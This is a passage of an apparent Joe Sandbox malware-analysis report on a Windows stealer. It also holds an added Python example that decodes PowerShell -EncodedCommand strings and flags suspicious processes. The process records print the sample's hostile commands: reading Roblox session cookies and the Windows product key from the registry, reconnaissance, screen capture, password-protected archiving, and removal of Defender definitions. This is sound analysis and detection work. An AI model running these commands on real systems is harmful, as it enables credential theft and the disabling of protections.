                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
                                                            Imagebase:0x7ff7438e0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:47
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\getmac.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:getmac
                                                            Imagebase:0x7ff6934e0000
                                                            File size:90'112 bytes
                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
                                                            Imagebase:0x7ff7fee70000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true
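
The records for Targets 31, 37, 44 and 49 are one chain: cmd.exe launches powershell.exe with -ExecutionPolicy Bypass and an -EncodedCommand, and the Add-Type call inside that script is what spawns csc.exe and cvtres.exe to compile a C# helper on the fly. The -EncodedCommand argument is base64 over UTF-16LE text; decoding Target 37's string yields a script that compiles a Screenshot class calling Graphics.CopyFromScreen over Screen.AllScreens and saves each display as a PNG. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it decodes such arguments and triages a constructed process list modelled on Targets 28 to 49. The parent links, rule names and the short stand-in script are the example's own assumptions; only REPORT_PREFIX is taken from the page.

```python
"""Decode PowerShell -EncodedCommand arguments and triage a process list.

Added example, not part of the Joe Sandbox report. The process records are
constructed to mirror the report's Target 28-49 entries (parent links are
assumed; the report's own process tree would supply them), and the encoded
script is a short stand-in for the report's real one.
"""
import base64
import re

# First 32 base64 characters of Target 37's -EncodedCommand, copied from
# the report. They decode to the opening of a here-string: $source = @"
REPORT_PREFIX = "JABzAG8AdQByAGMAZQAgAD0AIABAACIA"

# Constructed stand-in with the same Add-Type / CopyFromScreen /
# Screen.AllScreens pattern as the report's script, far shorter.
SAMPLE_SCRIPT = '''$source = @"
using System;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot {
    public static void Capture() {
        foreach (Screen s in Screen.AllScreens) {
            var b = new Bitmap(s.Bounds.Width, s.Bounds.Height);
            Graphics.FromImage(b).CopyFromScreen(s.Bounds.Location, Point.Empty, s.Bounds.Size);
            b.Save("./Display.png");
        }
    }
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
[Screenshot]::Capture()
'''


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command. Whitespace an HTML table may have wrapped
    into the string is stripped first; anything else non-base64 is an error."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64), validate=True)
    return raw.decode("utf-16-le")


# PowerShell accepts abbreviated switch names; these are the common spellings.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Rules applied to the decoded script text.
SCRIPT_RULES = [
    ("inline_csharp_add_type", re.compile(r"\bAdd-Type\b.*-TypeDefinition", re.I)),
    ("screen_capture", re.compile(r"CopyFromScreen|Screen\.AllScreens", re.I)),
]

# Rules applied to raw command lines (names are this example's own).
CMDLINE_RULES = [
    ("wlan_profile_harvest", re.compile(r"netsh\s+wlan\s+show\s+profiles?", re.I)),
    ("host_recon", re.compile(r'(^|[\s"])(systeminfo|getmac|tree\s+/A\s+/F)\b', re.I)),
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("csc_cmdline_response_file", re.compile(r'csc\.exe.*@".*\.cmdline"', re.I)),
]


def triage(procs):
    """Return {target: sorted findings} for every process that trips a rule.

    Each proc is a dict with keys target, parent, image, cmdline. A csc.exe
    whose parent is powershell.exe is flagged separately: that parent/child
    pair is the footprint of Add-Type compiling a type at run time."""
    by_id = {p["target"]: p for p in procs}
    findings = {}
    for p in procs:
        hits = set()
        cmd = p["cmdline"]
        for name, rx in CMDLINE_RULES:
            if rx.search(cmd):
                hits.add(name)
        m = ENC_ARG.search(cmd)
        if m:
            hits.add("encoded_command")
            try:
                script = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                hits.add("encoded_command_undecodable")
            else:
                for name, rx in SCRIPT_RULES:
                    if rx.search(script):
                        hits.add(name)
        parent = by_id.get(p["parent"])
        if (parent and p["image"].lower().endswith("csc.exe")
                and parent["image"].lower().endswith("powershell.exe")):
            hits.add("add_type_compile_child_of_powershell")
        if hits:
            findings[p["target"]] = sorted(hits)
    return findings


# Constructed records modelled on the report (parent 1 stands for the
# dropper, whose record is not included here).
ENCODED = encode_command(SAMPLE_SCRIPT)
PS_ARGS = "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
SAMPLE_PROCS = [
    {"target": 28, "parent": 1, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan show profile"},
    {"target": 30, "parent": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "systeminfo"'},
    {"target": 31, "parent": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "' + PS_ARGS + ENCODED + '"'},
    {"target": 37, "parent": 31,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_ARGS + ENCODED},
    {"target": 42, "parent": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "getmac"'},
    {"target": 44, "parent": 37,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"'},
    {"target": 47, "parent": 42, "image": r"C:\Windows\System32\getmac.exe",
     "cmdline": "getmac"},
]

if __name__ == "__main__":
    print("report prefix decodes to:", decode_encoded_command(REPORT_PREFIX))
    for target, tags in sorted(triage(SAMPLE_PROCS).items()):
        print(f"Target {target}: {', '.join(tags)}")
```

On a real report the command lines come straight from the process table; the one detail worth copying into a production rule is the parent/child check, because Add-Type's csc.exe child has no obviously malicious command line of its own and is only suspicious because powershell.exe spawned it.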

                                                            Target ID:50
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:53
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 16:16:16
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 55
Start time: 16:16:16
Start date: 20/07/2024
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff66dc00000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 16:16:16
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 57
Start time: 16:16:17
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 58
Start time: 16:16:17
Start date: 20/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 16:16:18
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 16:16:18
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 61
Start time: 16:16:18
Start date: 20/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 63
Start time: 16:16:21
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 64
Start time: 16:16:21
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 65
Start time: 16:16:21
Start date: 20/07/2024
Path: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
Imagebase: 0x7ff629af0000
File size: 630'736 bytes
MD5 hash: 9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 66
Start time: 16:16:23
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 67
Start time: 16:16:23
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 68
Start time: 16:16:23
Start date: 20/07/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic os get Caption
Imagebase: 0x7ff7db190000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 71
Start time: 16:16:24
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 72
Start time: 16:16:24
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 73
Start time: 16:16:24
Start date: 20/07/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic computersystem get totalphysicalmemory
Imagebase: 0x7ff7db190000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 74
Start time: 16:16:25
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 75
Start time: 16:16:25
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 76
Start time: 16:16:25
Start date: 20/07/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic csproduct get uuid
Imagebase: 0x7ff7db190000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 77
Start time: 16:16:26
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 78
Start time: 16:16:26
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 79
Start time: 16:16:26
Start date: 20/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 80
Start time: 16:16:27
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 81
Start time: 16:16:27
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 82
Start time: 16:16:27
Start date: 20/07/2024
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7db190000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 83
Start time: 16:16:28
Start date: 20/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase: 0x7ff7a8410000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 84
Start time: 16:16:28
Start date: 20/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 85
Start time: 16:16:28
Start date: 20/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 86
Start time: 16:16:30
                                                            Start date:20/07/2024
                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                            Imagebase:0x7ff7d3ef0000
                                                            File size:468'120 bytes
                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:8.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:19.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:20
7ff6fb1fa4fe 16744->16746 16747 7ff6fb1fa4ec FlsSetValue 16744->16747 16749 7ff6fb1fa4d9 16745->16749 16751 7ff6fb1fa204 _get_daylight 11 API calls 16746->16751 16747->16749 16750 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16749->16750 16750->16752 16753 7ff6fb1fa506 16751->16753 16752->16738 16754 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16753->16754 16754->16738 16757 7ff6fb1fa460 __GetCurrentState 45 API calls 16756->16757 16758 7ff6fb201969 16757->16758 16765 7ff6fb206098 16759->16765 16764 7ff6fb1febb9 MultiByteToWideChar 16762->16764 16768 7ff6fb2060fc 16765->16768 16766 7ff6fb1eb870 _log10_special 8 API calls 16767 7ff6fb1ff3cd 16766->16767 16767->16552 16768->16766 16770 7ff6fb1f032f 16769->16770 16771 7ff6fb1f031d 16769->16771 16774 7ff6fb1f033d 16770->16774 16778 7ff6fb1f0379 16770->16778 16772 7ff6fb1f43f4 _get_daylight 11 API calls 16771->16772 16773 7ff6fb1f0322 16772->16773 16775 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16773->16775 16776 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16774->16776 16783 7ff6fb1f032d 16775->16783 16776->16783 16777 7ff6fb1f06f5 16779 7ff6fb1f43f4 _get_daylight 11 API calls 16777->16779 16777->16783 16778->16777 16780 7ff6fb1f43f4 _get_daylight 11 API calls 16778->16780 16781 7ff6fb1f0989 16779->16781 16782 7ff6fb1f06ea 16780->16782 16784 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16781->16784 16785 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16782->16785 16783->16416 16784->16783 16785->16777 16787 7ff6fb1efa24 16786->16787 16816 7ff6fb1ef784 16787->16816 16789 7ff6fb1efa3d 16789->15972 16828 7ff6fb1ef6dc 16790->16828 16794 7ff6fb1e277c 16793->16794 16795 7ff6fb1f43f4 _get_daylight 11 API calls 16794->16795 16796 7ff6fb1e2799 16795->16796 16842 7ff6fb1f3ca4 16796->16842 16801 7ff6fb1e1bf0 49 API calls 16802 7ff6fb1e2807 16801->16802 16803 7ff6fb1e86b0 2 API calls 16802->16803 16804 7ff6fb1e281f 16803->16804 16805 
7ff6fb1e2843 MessageBoxA 16804->16805 16806 7ff6fb1e282c MessageBoxW 16804->16806 16807 7ff6fb1e2855 16805->16807 16806->16807 16808 7ff6fb1eb870 _log10_special 8 API calls 16807->16808 16809 7ff6fb1e2865 16808->16809 16809->16002 16811 7ff6fb1e1b06 16810->16811 16812 7ff6fb1ef439 16810->16812 16811->16001 16811->16002 16813 7ff6fb1f43f4 _get_daylight 11 API calls 16812->16813 16814 7ff6fb1ef43e 16813->16814 16815 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16814->16815 16815->16811 16817 7ff6fb1ef7ee 16816->16817 16818 7ff6fb1ef7ae 16816->16818 16817->16818 16820 7ff6fb1ef7fa 16817->16820 16819 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16818->16819 16821 7ff6fb1ef7d5 16819->16821 16827 7ff6fb1f477c EnterCriticalSection 16820->16827 16821->16789 16829 7ff6fb1e19b9 16828->16829 16830 7ff6fb1ef706 16828->16830 16829->15979 16829->15980 16830->16829 16831 7ff6fb1ef715 memcpy_s 16830->16831 16832 7ff6fb1ef752 16830->16832 16834 7ff6fb1f43f4 _get_daylight 11 API calls 16831->16834 16841 7ff6fb1f477c EnterCriticalSection 16832->16841 16837 7ff6fb1ef72a 16834->16837 16839 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16837->16839 16839->16829 16846 7ff6fb1f3cfe 16842->16846 16843 7ff6fb1f3d23 16844 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16843->16844 16848 7ff6fb1f3d4d 16844->16848 16845 7ff6fb1f3d5f 16872 7ff6fb1f1f30 16845->16872 16846->16843 16846->16845 16850 7ff6fb1eb870 _log10_special 8 API calls 16848->16850 16849 7ff6fb1f3e3c 16851 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16849->16851 16853 7ff6fb1e27d8 16850->16853 16851->16848 16860 7ff6fb1f4480 16853->16860 16854 7ff6fb1f3e60 16854->16849 16856 7ff6fb1f3e6a 16854->16856 16855 7ff6fb1f3e11 16857 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16855->16857 16859 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16856->16859 16857->16848 16858 7ff6fb1f3e08 16858->16849 16858->16855 16859->16848 
